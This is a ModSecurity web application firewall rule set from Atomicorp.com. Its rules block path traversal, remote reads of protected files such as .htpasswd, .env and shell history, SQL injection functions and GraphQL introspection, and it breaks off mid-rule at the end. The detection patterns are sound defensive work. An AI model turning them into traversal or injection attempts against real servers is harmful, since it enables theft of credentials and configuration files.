SecRule REQUEST_URI|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "/?\.?\./\.\./\.\./\.\./\.\." "phase:2,deny,log,auditlog,status:403,chain,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdline,id:347008,rev:16,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"
SecRule REQUEST_URI "!(?:/site-builder/|/node/(?:[0-9]+/(?:edit|add)|add/))"  "t:none,t:lowercase"

SecRule REQUEST_URI_RAW|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "\.\.\\\.\.\\\.\." "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:347019,rev:15,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious path recursion denied'"

#potentially malicious recursion
#../../../../..
SecRule REQUEST_URI_RAW|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "/?\.?\./\.\./\.\./\.\./\.\." "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:cmdline,id:347028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied (base64 encoded)'"
SecRule REQUEST_URI "!(?:/site-builder/|/node/(?:[0-9]+/(?:edit|add)|add/))"  "t:none,t:lowercase"


SecRule REQUEST_URI "(^/node/(?:[0-9]+/(?:edit|add)|add)/)"  "t:none,t:lowercase,phase:2,id:323714,pass,nolog,noauditlog,skipAfter:END_RULE_340008"
# Rule 340008: generic bogus path sigs
SecRule REQUEST_URI|REQUEST_FILENAME|REQUEST_HEADERS|ARGS|!ARGS:myDevEditControl_html|!ARGS:/^currentValue/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/summary/|!ARGS:resolution|!ARGS:prefix|!ARGS:/post/|!ARGS:/comment/|!ARGS:/description/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/msg/|!ARGS:suffix "/\.{3,}/" "capture,phase:2,log,auditlog,deny,status:403,t:none,t:urlDecodeUni,t:removenulls,t:cmdline,multimatch,id:340008,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Bogus Path denied',logdata:'%{TX.0},%{matched_var_name}'"

# Rule 340008: generic bogus path sigs
SecRule REQUEST_URI|REQUEST_FILENAME|REQUEST_HEADERS|ARGS|!ARGS:myDevEditControl_html|!ARGS:/^currentValue/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/summary/|!ARGS:resolution|!ARGS:prefix|!ARGS:/post/|!ARGS:/comment/|!ARGS:/description/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/msg/|!ARGS:suffix "/\.{3,}/" "capture,phase:2,log,auditlog,deny,status:403,t:none,t:urlDecodeUni,t:removenulls,t:cmdline,id:340218,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Bogus Path denied (base64 encoded)',logdata:'%{TX.0},%{matched_var_name}'"

SecMarker END_RULE_340008

# Rule 340142: Special account protection
SecRule REQUEST_URI "~(?:root|ftp|bin|admin|nobody|shutdown|named|guest|logs|sshd|mysql|postgres|oracle|tortix|atomic|httpd?)/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdLine,t:replaceNulls,t:normalisePath,id:340142,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Special account protection'"

SecRule SERVER_PORT "^(?:30000|8443)$" "phase:2,id:323712,pass,t:none,nolog,noauditlog,skipAfter:END_ASL_3"

SecRule REQUEST_URI "(?:|^/cpsess[0-9]+/scripts2?/|alt_mod_frameset.php|checkout_shipping.php|^/components/com_zoom/etc/|/admin\.swf\?nick=|/editor/filemanager/browser/default/browser\.html\?(type=image&)?Connector=\.\./\.\./connectors|/phpthumb\.php\?((?:w|h)=[0-9]+&)?((?:w|h)=[0-9]+&)?src=\.\./\.\./(?:uploads|images)|^/etc/[a-z0-9-_]+\.(css|html?|jpe?g|gif|png|te?xt)$|^/\?cx=|^/wizard/edit/html$|/mancgi/cronrun\?command|^/index\.php\?module=asl&event=|^/site/index\.php\?do=/admincp/setting/edit/|^/plesk/server/migration/|^/smb/web/)" "t:none,t:lowercase,phase:2,id:323716,pass,nolog,noauditlog,skipAfter:END_RULE_340009"
# Rule 340009: generic recursion signatures
SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:dictionaryPath|!ARGS:shell|!ARGS:/zip_path/|!ARGS:server_path|!ARGS:php|!ARGS:/^civicrm/|!ARGS:/imagemagick/|!ARGS:/^gvid_/|!ARGS:/app_path/|!ARGS:/script/|!ARGS:/bin_path/|!ARGS:/ffmpeg_path/|!ARGS:/exiftool_path/|!ARGS:/antiword/|!ARGS:/pdftotext/|!ARGS:/^SystemProperties/|!ARGS:/bin_path/|!ARGS:/IMConfig/|!ARGS:imagemagick_path|!ARGS:/referer/|!ARGS:/referrer/|!ARGS:response|!ARGS:data|!ARGS:cte_cmd|!ARGS:/setting/|!ARGS:MailPath|!ARGS:file_temporary_path|!ARGS:/workingDir/|!ARGS:containers.env.value|!ARGS:jpg_path|!ARGS:/^groups/|!ARGS:editor|!ARGS:article|!ARGS:/shell/|!ARGS:/content/|!ARGS:/tx_extensionmanager/|!ARGS:/aspell/|!ARGS:title|!ARGS:/sidebar/|!ARGS:/^p_process/|!ARGS:prefix|!ARGS:suffix|!ARGS:resolution|!ARGS:/^w2Pcfg/|!ARGS:returnto|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:name|!ARGS:/redirect/|!ARGS:/path_to_file_cmd/|!ARGS:timezone|!ARGS:ZM_EXTRA_DEBUG_LOG|!ARGS:/ZM_PATH/|!ARGS:/device/|!ARGS:/sendmail/|!ARGS:/txt/|!ARGS:/summary/|!ARGS:/text/|!ARGS:/^config/|!ARGS:/^dPcfg/|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/data/|!ARGS:/txt/|!ARGS:csum|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/desc/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:/body/ "(?:(\.\.|^| )/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|(?:win|boot\.ini))" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:cmdLine,t:replaceNulls,capture,id:340009,rev:68,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}',multimatch,log,auditlog"
SecMarker END_RULE_340009

SecMarker END_FILE_PROTECTION_1

SecRule REQUEST_URI "(?:/products/index\.php\?gallery=|connector=\.\./\.\./connectors|^/admin/(?:structure/views/|[a-z]+/(?:edit|add)|d/1/)|/phpthumb\.php\?((?:w|h)=[0-9]+&)?((?:w|h)=[0-9]+&)?src=\.\./.{0,32}(?:pics|uploads|images)|/site-(?:builder|content)/|/node/(?:[0-9]+/(?:edit|add)|add/)|^/typo3/sysext/rtehtmlarea/mod3/browse_links\.php\?@rtetsconfigparams|^/eprocservice/supplierinboundservice)" "t:none,t:lowercase,phase:2,id:323715,pass,nolog,noauditlog,skipAfter:END_RULE_340007"


#Rule 340007: generic recursion signatures
#ver 1
#SecRule REQUEST_URI_RAW|ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\.){2}(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"

#probably too many FPs
#SecRule REQUEST_URI_RAW|ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"
#ver 2
SecRule ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"

SecMarker END_RULE_340007

SecRule SERVER_PORT "@streq 30000" "phase:2,id:323710,pass,t:none,nolog,noauditlog,skipAfter:END_ASL_3"
#Protected file upload protection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:templatecode|!ARGS:areas|!ARGS:title "@pm .www_acl .htpasswd web.config .htaccess boot.ini httpd.conf /etc/ .htgroup global.asa .wwwacl .history sh_history env" "phase:2,id:'333796',t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334362,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_2"

SecRule REQUEST_URI "^(?:/cpsess[0-9]+/(?:scripts2?|json-api)/|^/file\?file=/etc/cccam\.cfg$|event=update_asl_config|^/etc/(?:js/|\?)|^/index\.php\?module=asl&event=|^/etc/img/)" "t:none,t:urlDecodeUni,t:lowercase,phase:2,id:323765,pass,nolog,noauditlog,skipAfter:END_RULE_390709"

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:resolution|!ARGS:tiny_vals|!ARGS:/description/|!ARGS:title|!ARGS:/content/|!ARGS:/title/|!ARGS:/systemfilter/|!ARGS:parent_name|!ARGS:/^config_setting/|!ARGS:name|!ARGS:v_zZ_ConfDir|!ARGS:/keyword/|!ARGS:/desc/|!ARGS:/summary/|!ARGS:csum|!ARGS:suffix|!ARGS:prefix|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/search/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/data/ "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini|web.config)\b|( |^|\.\.)/etc/|/\.(?:history|bash_history|sh_history|env)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:cmdLine,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to access protected file remotely',id:'390709',rev:30,logdata:'%{TX.0}',severity:'2'"

SecMarker END_RULE_390709

SecMarker END_ASL_3

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:cmdLine,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to access protected file remotely',id:'390719',rev:6,logdata:'%{TX.0}',severity:'2'"
#
SecMarker END_FILE_PROTECTION_2


################ SQL injection rules #########################
#Always SQL injection cases w/ antievasion
SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|flv|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|css|ico|avi|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|xls|doc|od(?:t|s)|ppt|wbk)$" "phase:2,pass,id:'333797',t:none,t:lowercase,nolog,noauditlog,setvar:tx.static=1,skipAfter:END_SQL_CHECKS"

SecRule REQUEST_URI "(^/node/add/|/admin/content/|/todo\?action=edit$|^/eprocservice/supplierinboundservice|^/ntunnel_mysql|^/([a-z0-9]+/)index\.php\?controller=adminmodules\?configure=megaimporter)"  "phase:2,pass,id:'333798',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS"

SecRule ARGS:module "^modulebuilder$" "phase:2,pass,id:'353799',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS"

SecRule REQUEST_URI "(?:^/adminer/adminer\.php\?server=|^/[a-z]+/index\.php\?/tickets/ajax/replylock)"  "phase:2,pass,id:'375798',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_PM1"

SecRule REQUEST_URI "^/index\.php\?route=/table/replace$" "id:321112,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:SKIP_AFTER_RULE_344367" 

#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:availability|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:ausgabe|!ARGS:/google/|!ARGS:/theme/|!ARGS:/form/|!ARGS:/content/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:prod_|!ARGS:/prod_/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/jql/|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS:input_25|!ARGS_NAMES:/^jform/|XML:/* "@rx (?i)\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|t(?:d(?:dev_(?:sam|po)p)?|r(?:_to_date|cmp))|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:inser_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o(?:(?:second|day)s|_base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|a(?:wtohex|dians|nd)|o(?:w_count|und)|ight|trim|pad)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*\(" "id:344367,rev:10,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL Injection Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',ctl:auditLogParts=+E"

SecMarker SKIP_AFTER_RULE_344367

#GraphQL
#query IntrospectionQuery {
#{__schema{queryType{
SecRule REQUEST_BODY|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|XML:/* "@rx (?:query introspectionquery ?|__schema\ ?{ ?(?:querytype|types?)) ?\{" "id:344378,rev:2,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:removecomments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: GraphQL Injection Attack attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"

#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:home_branch|ARGS_NAMES|ARGS|!ARGS:data|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|!ARGS:/content/|!ARGS:/html/|!ARGS:/email/|!ARGS:/signature/|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" "id:344371,rev:4,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: SQL Injection Attack/SQL authentication bypass attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"



#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|XML:/* "@rx 